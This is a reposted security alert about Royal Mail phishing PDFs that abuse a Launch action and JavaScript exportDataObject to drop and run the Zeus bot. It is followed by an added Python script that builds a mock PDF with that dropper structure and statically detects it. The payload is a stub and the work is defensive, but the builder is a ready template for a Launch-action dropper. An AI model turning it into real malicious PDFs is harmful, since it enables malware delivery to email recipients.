Hi, today we began seeing emails, like the one shown below, claiming to be from Royal Mail with an attached PDF file.

This PDF uses a feature of the PDF format known as a Launch action. A Launch action is intended to run an application, or to open or print a document. A security researcher recently discovered that this feature can also be used to run an executable embedded within the PDF file.

This PDF also contains an attachment (PDFs can have files embedded within them, just like emails) named Royal_Mail_Delivery_Notice.pdf, which is stored compressed inside the PDF file. Despite its name, this attachment is actually an executable file and, if run, will install the Zeus bot. The image below shows part of this attachment within the PDF file; the start of the executable is shown decompressed in the red box.

The PDF uses the JavaScript function exportDataObject, shown below, to save a copy of the attachment to the user's PC. When this PDF is opened in Adobe Reader with JavaScript enabled, the exportDataObject call causes a dialog box to be displayed asking the user to "Specify a file to extract to". The default file name is the name of the attachment, Royal_Mail_Delivery_Notice.pdf. This could be somewhat confusing to users: not really knowing what is happening, they may just click Save (it appears as if they are simply saving a PDF file, after all). Users of Foxit Reader get no warning at all, and the attachment is saved to the user's Documents folder.

Once the exportDataObject call has completed, the Launch action runs. The Launch action executes the Windows command interpreter (cmd.exe) and passes it a command line to run. This command line searches for the previously saved Royal_Mail_Delivery_Notice.pdf in some commonly used folders such as My Documents and Desktop, and then tries to run the file (remember that this is actually the executable). Adobe Reader will pop up the box shown below, and the command will only be run if the user clicks 'Open'.
The latest version of Foxit Reader (released April 1st) will display a similar warning; older versions will go ahead and execute the command without asking. If this command is successfully run, the Zeus data-stealing bot is installed.

Although having the latest versions of Foxit and Adobe Reader will not protect you entirely from this feature, they do offer configuration settings and warnings before any program is launched. In Adobe Reader you can disable the opening of non-PDF attachments using the Trust Manager in the Preferences menu. You can also disable JavaScript in both readers to mitigate the impact of this and many other vulnerabilities; note that this blocks the exportDataObject step used here, but a Launch action itself does not depend on JavaScript, so the attachment setting is the more direct control. MailMarshal users with the Block Executable rule enabled will be protected from PDF attachments with executable attachments. SpamCensor version 431 and KnownThreats version 26 both protect MailMarshal users from PDFs using this Launch action and executable attachment feature.

--
You received this message because you are subscribed to the Google Groups "nforceit" group. For more options, visit this group at http://groups.google.com/group/nforceit?hl=en-GB.
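As an added example, not part of the original post and not MailMarshal's own detection logic, the Python below builds a small constructed PDF that contains the three pieces described above (document-level JavaScript calling exportDataObject, a compressed /EmbeddedFile whose content is a PE executable, and a /Launch action that runs cmd.exe, chained with /Next so the Launch runs after the JavaScript) and then triages it statically the way a mail gateway might. The object layout, the attachment name, the JavaScript and the cmd.exe command line are assumptions written in the style the post describes, not taken from the real sample.

```python
import re
import zlib

# --- constructed sample (assumptions, not the real malicious file) -------------
ATTACHMENT = b"Royal_Mail_Delivery_Notice.pdf"
# Stand-in for the dropped executable: the detector only needs the MZ header.
FAKE_EXE = b"MZ\x90\x00" + b"\x00" * 60 + b"This program cannot be run in DOS mode.\r\n"
# Hypothetical cmd.exe line: look in a couple of common folders for the dropped
# file and run whichever copy exists (same idea as the post, not the same text).
LAUNCH_CMD = (b'/c cd %HOMEDRIVE%%HOMEPATH% & '
              b'if exist "My Documents\\' + ATTACHMENT + b'" start "" "My Documents\\' + ATTACHMENT + b'" & '
              b'if exist "Desktop\\' + ATTACHMENT + b'" start "" "Desktop\\' + ATTACHMENT + b'"')
# Hypothetical document JavaScript: save the attachment (nLaunch 0 = save, do not open).
JS = b'this.exportDataObject({cName: "' + ATTACHMENT + b'", nLaunch: 0});'

PDF_STRING = rb"\(((?:\\.|[^\\)])*)\)"  # one PDF literal string; group 1 is its body


def pdf_string(s: bytes) -> bytes:
    """Encode bytes as a PDF literal string, escaping backslash and parentheses."""
    return b"(" + re.sub(rb"([\\()])", rb"\\\1", s) + b")"


def unescape(s: bytes) -> bytes:
    """Undo the escapes pdf_string() produces."""
    return re.sub(rb"\\([\\()])", rb"\1", s)


def build_sample_pdf() -> bytes:
    """Assemble the constructed PDF with a valid xref so a strict parser accepts it."""
    stream = zlib.compress(FAKE_EXE)  # the attachment is FlateDecode-compressed, as in the post
    objects = {
        1: b"<< /Type /Catalog /Pages 2 0 R /OpenAction 7 0 R /Names << /EmbeddedFiles << /Names ["
           + pdf_string(ATTACHMENT) + b" 4 0 R] >> >> >>",
        2: b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        3: b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>",
        # file specification -> compressed embedded-file stream (the "attachment")
        4: b"<< /Type /Filespec /F " + pdf_string(ATTACHMENT) + b" /EF << /F 5 0 R >> >>",
        5: b"<< /Type /EmbeddedFile /Filter /FlateDecode /Length %d >>\nstream\n" % len(stream)
           + stream + b"\nendstream",
        # Launch action: run cmd.exe with the command line above
        6: b"<< /Type /Action /S /Launch /Win << /F (cmd.exe) /P " + pdf_string(LAUNCH_CMD) + b" >> >>",
        # open action: JavaScript saves the attachment, then /Next chains into the Launch
        7: b"<< /Type /Action /S /JavaScript /JS " + pdf_string(JS) + b" /Next 6 0 R >>",
    }
    out, offsets = bytearray(b"%PDF-1.4\n"), {}
    for num, body in sorted(objects.items()):
        offsets[num] = len(out)
        out += b"%d 0 obj\n" % num + body + b"\nendobj\n"
    xref = len(out)
    out += b"xref\n0 %d\n0000000000 65535 f \n" % (len(objects) + 1)
    for num in sorted(objects):
        out += b"%010d 00000 n \n" % offsets[num]
    out += b"trailer\n<< /Size %d /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n" % (len(objects) + 1, xref)
    return bytes(out)


# --- triage ----------------------------------------------------------------------
INDICATORS = {
    "launch_action":      rb"/S\s*/Launch\b",
    "embedded_file":      rb"/EmbeddedFile\b",
    "javascript":         rb"/(?:JavaScript|JS)\b",
    "export_data_object": rb"exportDataObject",
    "cmd_exe":            rb"cmd\.exe",
}


def flate_streams(pdf: bytes):
    """Yield (stream dictionary, inflated data) for each stream declaring /FlateDecode.
    Regex-based triage, not a full PDF parser: good enough for this sample layout."""
    for m in re.finditer(rb"<<([^>]*)>>\s*stream\r?\n(.*?)\nendstream", pdf, re.S):
        header, raw = m.group(1), m.group(2)
        if b"/FlateDecode" in header:
            try:
                yield header, zlib.decompress(raw)
            except zlib.error:
                pass  # corrupt stream: nothing to inflate, other indicators still apply


def launch_commands(pdf: bytes):
    """Return (program, parameters) for every Windows /Launch target in the file."""
    found = []
    for win in re.finditer(rb"/Win\s*<<(.*?)>>", pdf, re.S):
        f = re.search(rb"/F\s*" + PDF_STRING, win.group(1), re.S)
        p = re.search(rb"/P\s*" + PDF_STRING, win.group(1), re.S)
        found.append((unescape(f.group(1)) if f else b"", unescape(p.group(1)) if p else b""))
    return found


def attachment_names(pdf: bytes):
    """Names declared by /Filespec dictionaries (what the user is asked to 'extract')."""
    return [unescape(m.group(1)) for m in
            re.finditer(rb"/Type\s*/Filespec[^>]*?/F\s*" + PDF_STRING, pdf, re.S)]


def triage(pdf: bytes) -> dict:
    """Flag the Launch + executable-attachment combination, looking inside compressed streams too."""
    report = {name: bool(re.search(pat, pdf)) for name, pat in INDICATORS.items()}
    report["executable_attachment"] = False
    for header, data in flate_streams(pdf):
        if b"/EmbeddedFile" in header and data.startswith(b"MZ"):  # PE header inside the attachment
            report["executable_attachment"] = True
        for name, pat in INDICATORS.items():  # indicators may also sit inside compressed objects
            report[name] = report[name] or bool(re.search(pat, data))
    report["attachments"] = attachment_names(pdf)
    report["launch"] = launch_commands(pdf)
    report["block"] = report["launch_action"] and report["executable_attachment"]
    return report


if __name__ == "__main__":
    for key, value in triage(build_sample_pdf()).items():
        print(f"{key:22} {value!r}")
```

Run it directly to print the report for the constructed sample, or pass the bytes of a suspicious attachment to `triage()`. The `block` flag mirrors the gateway decision described later in the post: a /Launch action together with an embedded file whose inflated content starts with an MZ header. Being regex-based, it will miss indicators hidden in object streams or behind filters other than FlateDecode, which is why the reader-side settings discussed below still matter.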
